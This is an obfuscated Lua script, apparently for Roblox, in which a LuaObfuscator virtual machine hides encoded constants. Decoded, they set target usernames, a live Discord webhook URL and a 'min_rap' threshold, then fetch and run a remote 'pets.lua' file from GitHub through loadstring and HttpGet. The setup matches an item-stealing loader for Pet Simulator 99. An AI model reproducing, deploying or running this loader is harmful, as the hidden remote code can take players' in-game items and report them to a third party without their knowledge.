--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;function v28(...) return {...},v12("#",...);end v29=nil;function v29() local v31=0;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v31==(0 -0)) then v32=392 -(232 + 160) ;v33=nil;v31=1;end if (v31==(6 -2)) then while true do if (v32==1) then v35=nil;v36=nil;v32=2;end if (v32~=(1277 -(37 + 1240))) then else v33=0 -0 ;v34=nil;v32=1;end if (v32~=(10 -7)) then else v39=nil;while true do local v99=0 -0 ;local v100;while true do if (v99~=0) then else v100=0;while true do if (0~=v100) then else if (v33~=(1 + 2)) then else for v148=1,v24() do v35[v148-1 ]=v29();end return v37;end if (v33==1) then local v143=0 -0 ;while true do if (v143==1) then v39={};v33=2;break;end if (v143==0) then local v183=0 + 0 ;while true do if (v183~=(1475 -(1329 + 145))) then else v143=1;break;end if (v183~=(971 -(140 + 831))) then else v37={v34,v35,nil,v36};v38=v24();v183=1851 -(1409 + 441) ;end end end end end v100=719 -(15 + 703) ;end if (1==v100) then if (v33~=(0 + 0)) then else local v144=438 -(262 + 176) ;while true do if (v144==1) then v36={};v33=1722 -(345 + 1376) ;break;end if (v144==0) then v34={};v35={};v144=689 -(198 + 490) ;end end end if (v33~=2) then else local v145=0 -0 ;while true do if ((2 -1)==v145) then for v185=1207 -(696 + 510) ,v24() do local v186=0 -0 ;local v187;local v188;local v189;while true do if (v186~=(1262 -(1091 + 171))) then else v187=0 + 0 ;v188=nil;v186=1;end if (v186==1) then v189=nil;while true do if (v187~=1) then else while true do if (v188~=(0 -0)) then else v189=v22();if (v21(v189,3 -2 ,375 -(123 + 251) )~=0) then else local v200=0 -0 ;local v201;local v202;local v203;local v204;while true do if (v200~=(700 -(208 + 490))) then else while true do if (v201==(1 + 0)) then local v209=0;local v210;while true do if ((0 + 0)==v209) then v210=0;while true do if (v210==(836 -(660 + 176))) then local v223=0 + 0 ;while true do if (v223~=(203 -(14 + 188))) then else v210=1;break;end if (v223==(675 -(534 + 141))) then v204={v23(),v23(),nil,nil};if (v202==(0 -0)) then local v225=0 -0 ;local v226;local v227;while true do if (v225==1) then while true do if ((0 -0)==v226) then v227=0;while true do if (v227==0) then v204[2 + 1 ]=v23();v204[3 + 1 ]=v23();break;end end break;end end break;end if (v225==(396 -(115 + 281))) then local v229=0 -0 ;while true do if (v229==(0 + 0)) then v226=0 -0 ;v227=nil;v229=1;end if (v229==1) then v225=3 -2 ;break;end end end end elseif (v202==(868 -(550 + 317))) then v204[3 -0 ]=v24();elseif (v202==(2 -0)) then v204[3]=v24() -((5 -3)^(301 -(134 + 151))) ;elseif (v202==3) then local v231=0;while true do if (v231==0) then v204[1668 -(970 + 695) ]=v24() -(2^16) ;v204[7 -3 ]=v23();break;end end end v223=1991 -(582 + 1408) ;end end end if (v210~=1) then else v201=6 -4 ;break;end end break;end end end if (v201~=3) then else if (v21(v203,3,3 -0 )~=1) then else v204[4]=v39[v204[15 -11 ]];end v34[v185]=v204;break;end if ((1824 -(1195 + 629))==v201) then local v212=0 -0 ;while true do if (v212==1) then v201=242 -(187 + 54) ;break;end if (v212==0) then local v217=0;while true do if (v217==0) then local v224=0;while true do if (v224~=(781 -(162 + 618))) then else v217=1;break;end if (v224==0) then v202=v21(v189,2,3 + 0 );v203=v21(v189,3 + 1 ,6);v224=1 -0 ;end end end if (v217==1) then v212=1;break;end end end end end if (v201==(2 -0)) then local v213=0;while true do if (v213~=(1 + 0)) then else v201=3;break;end if (v213==(1636 -(1373 + 263))) then if (v21(v203,1,1)~=1) then else v204[2]=v39[v204[2]];end if (v21(v203,1002 -(451 + 549) ,1 + 1 )~=(1 -0)) then else v204[4 -1 ]=v39[v204[1387 -(746 + 638) ]];end v213=1 + 0 ;end end end end break;end if (v200==(1 -0)) then local v205=0;while true do if (0~=v205) then else local v214=0;while true do if (v214~=(342 -(218 + 123))) then else v205=1582 -(1535 + 46) ;break;end if (v214==(0 + 0)) then v203=nil;v204=nil;v214=1 + 0 ;end end end if (v205==(561 -(306 + 254))) then v200=1 + 1 ;break;end end end if (v200~=(0 -0)) then else local v206=1467 -(899 + 568) ;local v207;while true do if (0==v206) then v207=0 + 0 ;while true do if (v207~=0) then else local v218=0 -0 ;while true do if (v218~=1) then else v207=604 -(268 + 335) ;break;end if (v218~=0) then else v201=290 -(60 + 230) ;v202=nil;v218=573 -(426 + 146) ;end end end if (v207~=(1 + 0)) then else v200=1;break;end end break;end end end end end break;end end break;end if (v187~=(1456 -(282 + 1174))) then else v188=811 -(569 + 242) ;v189=nil;v187=1;end end break;end end end v33=8 -5 ;break;end if (v145~=0) then else for v190=1 + 0 ,v38 do local v191=1024 -(706 + 318) ;local v192;local v193;local v194;local v195;while true do if (1~=v191) then else v194=nil;v195=nil;v191=2;end if (v191==0) then v192=0;v193=nil;v191=1252 -(721 + 530) ;end if (2==v191) then while true do if (1~=v192) then else v195=nil;while true do if (v193==0) then local v197=0;local v198;while true do if (v197~=(1271 -(945 + 326))) then else v198=0;while true do if (v198==1) then v193=1;break;end if (v198==0) then local v208=0 -0 ;while true do if (v208==(1 + 0)) then v198=701 -(271 + 429) ;break;end if (v208~=(0 + 0)) then else v194=v22();v195=nil;v208=1;end end end end break;end end end if (v193~=(1501 -(1408 + 92))) then else if (v194==(1087 -(461 + 625))) then v195=v22()~=0 ;elseif (v194==(1290 -(993 + 295))) then v195=v25();elseif (v194~=(1 + 2)) then else v195=v26();end v39[v190]=v195;break;end end break;end if (v192==0) then local v196=0;while true do if (v196==(1172 -(418 + 753))) then v192=1 + 0 ;break;end if (v196==(0 + 0)) then v193=0 + 0 ;v194=nil;v196=1;end end end end break;end end end v37[1 + 2 ]=v22();v145=1;end end end break;end end break;end end end break;end if (v32~=2) then else local v98=529 -(406 + 123) ;while true do if (v98==1) then v32=1772 -(1749 + 20) ;break;end if (v98~=0) then else v37=nil;v38=nil;v98=1 + 0 ;end end end end break;end if (v31==1) then v34=nil;v35=nil;v31=1324 -(1249 + 73) ;end if (v31~=(1 + 1)) then else v36=nil;v37=nil;v31=1148 -(466 + 679) ;end if (v31==3) then v38=nil;v39=nil;v31=9 -5 ;end end end v18=5;end if (v18==3) then function v25() local v40=v24();local v41=v24();local v42=2 -1 ;local v43=(v21(v41,1901 -(106 + 1794) ,(72 -(30 + 35)) + 13 ) * (2^(9 + 23))) + v40 ;local v44=v21(v41,61 -40 ,83 -(36 + 16) );local v45=((v21(v41,146 -(4 + 110) )==(585 -(57 + 527))) and  -(1428 -((1298 -(1043 + 214)) + 1386))) or (104 -(17 + 86)) ;if (v44==(0 + 0)) then if (v43==(0 -0)) then return v45 * (0 -0) ;else v44=1;v42=166 -(122 + 44) ;end elseif (v44==2047) then return ((v43==0) and (v45 * ((1 -0)/(0 -(0 -0))))) or (v45 * NaN) ;end return v8(v45,v44-(833 + (1402 -(323 + 889))) ) * (v42 + (v43/((1 + 1)^(104 -52)))) ;end v26=nil;function v26(v46) local v47;if  not v46 then local v72=0 -0 ;while true do if (v72==0) then v46=v24();if (v46==(580 -(361 + 50 + 169))) then return "";end break;end end end v47=v3(v16,v19,(v19 + v46) -(321 -(53 + 267)) );v19=v19 + v46 ;local v48={};for v70=1, #v47 do v48[v70]=v2(v1(v3(v47,v70,v70)));end return v6(v48);end v27=v24;v18=4;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v49) if (v1(v49,2)==79) then v20=v0(v3(v49,1,1));return "";else local v73=0;local v74;while true do if (v73==0) then v74=v2(v0(v49,16));if v20 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v74,v20);v20=nil;v101=1;end end else return v74;end break;end end end end);v21=nil;v18=1;end if (2==v18) then function v23() local v50=413 -(15 + 398) ;local v51;local v52;while true do if (v50==(983 -(18 + 964))) then return (v52 * (963 -707)) + v51 ;end if (v50==(0 + 0)) then v51,v52=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 + 0 ;v50=851 -((146 -(116 + 10)) + 830) ;end end end v24=nil;function v24() local v53=0 + 0 ;local v54;local v55;local v56;local v57;while true do if (v53==1) then return (v57 * (16777954 -(542 + 196))) + (v56 * (168020 -102484)) + (v55 * (548 -292)) + v54 ;end if (v53==(0 + (1551 -(1126 + 425)))) then v54,v55,v56,v57=v1(v16,v19,v19 + 2 + 1 );v19=v19 + 2 + 2 ;v53=2 -1 ;end end end v25=nil;v18=3;end if (v18==1) then function v21(v58,v59,v60) if v60 then local v75=(v58/(2^(v59-(1 -0))))%((407 -((570 -452) + 287))^(((v60-(3 -2)) -(v59-(1122 -(118 + 1003)))) + (2 -(1 + 0)))) ;return v75-(v75%(378 -(142 + (988 -(239 + 514))))) ;else local v76=0 -0 ;local v77;while true do if ((0 -0)==v76) then v77=(5 -3)^(v59-(1 + 0 + 0)) ;return (((v58%(v77 + v77))>=v77) and (978 -(553 + 424))) or 0 ;end end end end v22=nil;function v22() local v61=1329 -(797 + 532) ;local v62;while true do if (v61==0) then v62=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v61=(1203 -(373 + 829)) + 0 ;end if (v61==(2 -1)) then return v62;end end end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v63,v64,v65) local v66=0;local v67;local v68;local v69;while true do if (v66==1) then v69=v63[3];return function(...) local v81=v67;local v82=v68;local v83=v69;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=4) then if (v94<=1) then if (v94==0) then local v107;local v108,v109;local v110;local v111;v91[v93[2]]=v65[v93[3]];v85=v85 + 1 ;v93=v81[v85];v111=v93[2];v110=v91[v93[3]];v91[v111 + 1 ]=v110;v91[v111]=v110[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v111=v93[2];v108,v109=v84(v91[v111](v13(v91,v111 + 1 ,v93[3])));v86=(v109 + v111) -1 ;v107=0;for v127=v111,v86 do local v128=0;while true do if (v128==0) then v107=v107 + 1 ;v91[v127]=v108[v107];break;end end end v85=v85 + 1 ;v93=v81[v85];v111=v93[2];v91[v111]=v91[v111](v13(v91,v111 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];do return;end else v91[v93[2]]();end elseif (v94<=2) then v91[v93[2]]=v65[v93[3]];elseif (v94==3) then local v129=v93[2];local v130,v131=v84(v91[v129](v13(v91,v129 + 1 ,v93[3])));v86=(v131 + v129) -1 ;local v132=0;for v140=v129,v86 do v132=v132 + 1 ;v91[v140]=v130[v132];end else do return;end end elseif (v94<=7) then if (v94<=5) then v91[v93[2]]=v93[3];elseif (v94>6) then local v133=0;local v134;local v135;while true do if (1==v133) then v91[v134 + 1 ]=v135;v91[v134]=v135[v93[4]];break;end if (v133==0) then v134=v93[2];v135=v91[v93[3]];v133=1;end end else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=8) then local v125=v93[2];v91[v125]=v91[v125](v13(v91,v125 + 1 ,v86));elseif (v94==9) then v65[v93[3]]=v91[v93[2]];else local v139=0;while true do if (v139==5) then v65[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v139=6;end if (v139==8) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v139=9;end if (v139==3) then v65[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v139=4;end if (v139==7) then v65[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v139=8;end if (v139==6) then v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v139=7;end if (v139==9) then v65[v93[3]]=v91[v93[2]];break;end if (v139==4) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v139=5;end if (v139==2) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v139=3;end if (v139==0) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v139=1;end if (v139==1) then v65[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v139=2;end end end v85=v85 + 1 ;end end;end if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end end end return v30(v29(),{},v17)(...);end end end return v15("LOL!0D3O0003083O00557365726E616D65030D3O007177657264736173313332313203093O00557365726E616D6532030A3O00736B79707368696B6F7603073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132332O3730392O352O3031303736353339332F6D4F514D636E4E75526D5953687838697A715761692O4A777842564A712O747969303473327378333639436270576D654634367634706F3348313377325445337445334403073O0053752O706F727403073O006D696E5F726170024O0080841E41030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F502O392F6D61696E2F706574732E6C756100123O00120A3O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00058O00013O00124O00073O00124O00093O00124O00083O0012023O000A3O00122O0001000B3O00202O00010001000C00122O0003000D6O000100039O0000026O000100016O00017O00",v9(),...);
